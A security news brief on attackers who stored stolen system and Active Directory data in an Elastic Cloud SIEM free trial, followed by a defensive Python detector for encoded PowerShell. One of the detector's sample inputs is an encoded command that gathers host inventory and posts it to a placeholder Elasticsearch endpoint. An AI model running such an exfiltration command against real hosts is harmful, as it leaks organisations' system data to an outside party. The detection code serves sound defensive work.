
Elastic Cloud SIEM free trial exploited for exfiltrated data storage


Infosecurity Magazine reports that a free trial of Elastic Cloud's security information and event management platform was harnessed to store data pilfered from hundreds of systems as part of an attack campaign that exploited various software flaws.

According to Huntress analysts, infiltrated systems were injected with an encoded PowerShell command that exfiltrated system information, Active Directory details, hardware specifications, and installed-patch information to an Elasticsearch index. The attacker registered the trial account with a disposable email address tied to quieresmail[.]com; the account was created on Jan. 28 and remained active for days afterwards. At least 216 hosts across 34 AD domains have been impacted by the campaign, most of them servers owned by financial services firms, government entities, IT service providers, manufacturing firms, and educational institutions.

"We have performed outreach and victim notification to organizations that we believe were indicated within the uncovered data, and we have coordinated with Elastic in a collaborative effort to further investigate and take down this threat actor infrastructure," said Huntress.
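As an added defender-side example (not code from the article, Huntress or Elastic), the Python sketch below decodes the -EncodedCommand argument from PowerShell process-creation command lines and flags scripts that pair host-inventory cmdlets with a write to an Elasticsearch index, the collection-and-upload pattern described above. The Elastic Cloud hostname suffixes, the cmdlet list and the sample command lines are assumptions constructed for the example, not indicators from the campaign.

```python
import base64
import re
# Decodes PowerShell -EncodedCommand payloads from process-creation command lines
# and flags ones that gather host inventory and POST it to an Elasticsearch index.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(?::(\d+))?(/[^\s'\"]*)?", re.I)
ES_PATH_RE = re.compile(r"/_(?:bulk|doc|create)(?:/|\?|$)")  # index/bulk write APIs
ES_HOST_SUFFIXES = (".es.io", ".elastic-cloud.com")  # assumed Elastic Cloud naming
# Cmdlets that collect the kinds of data the article says were exfiltrated.
COLLECTORS = ("Get-ComputerInfo", "Get-HotFix", "Get-ADComputer",
              "Get-ADDomain", "Get-CimInstance", "Get-WmiObject")

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:  # PowerShell encodes the script as base64 over UTF-16LE
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def inspect_command_line(cmdline):
    """Classify one command line; None when it carries no encoded payload."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None
    es_targets = []
    for host, port, path in URL_RE.findall(script):
        if (host.lower().endswith(ES_HOST_SUFFIXES) or port == "9200"
                or ES_PATH_RE.search(path or "")):
            es_targets.append(host + (path or ""))
    collectors = [c for c in COLLECTORS if c.lower() in script.lower()]
    return {"script": script, "es_targets": es_targets, "collectors": collectors,
            "suspicious": bool(es_targets and collectors)}

def encode_for_powershell(script):  # base64 over UTF-16LE, as PowerShell expects
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines (not from the article); hostname is a placeholder.
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -enc " + encode_for_powershell(
        "$d = Get-ComputerInfo | ConvertTo-Json; Get-HotFix; Invoke-RestMethod "
        "-Method Post -Uri 'https://PLACEHOLDER-deployment.es.io/hosts/_doc' -Body $d"),
    "powershell.exe -EncodedCommand " + encode_for_powershell("Get-Date"),
    "powershell.exe -NoProfile -Command Get-Process",
]
def suspicious_samples():  # indexes of SAMPLE_CMDLINES the inspector flags
    return [i for i, cmd in enumerate(SAMPLE_CMDLINES)
            if (r := inspect_command_line(cmd)) and r["suspicious"]]
```

Run over real Sysmon or Security 4688 command lines, the same inspector reports which decoded scripts both inventory the host and write to an index endpoint, which is the combination worth alerting on rather than encoded PowerShell alone.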
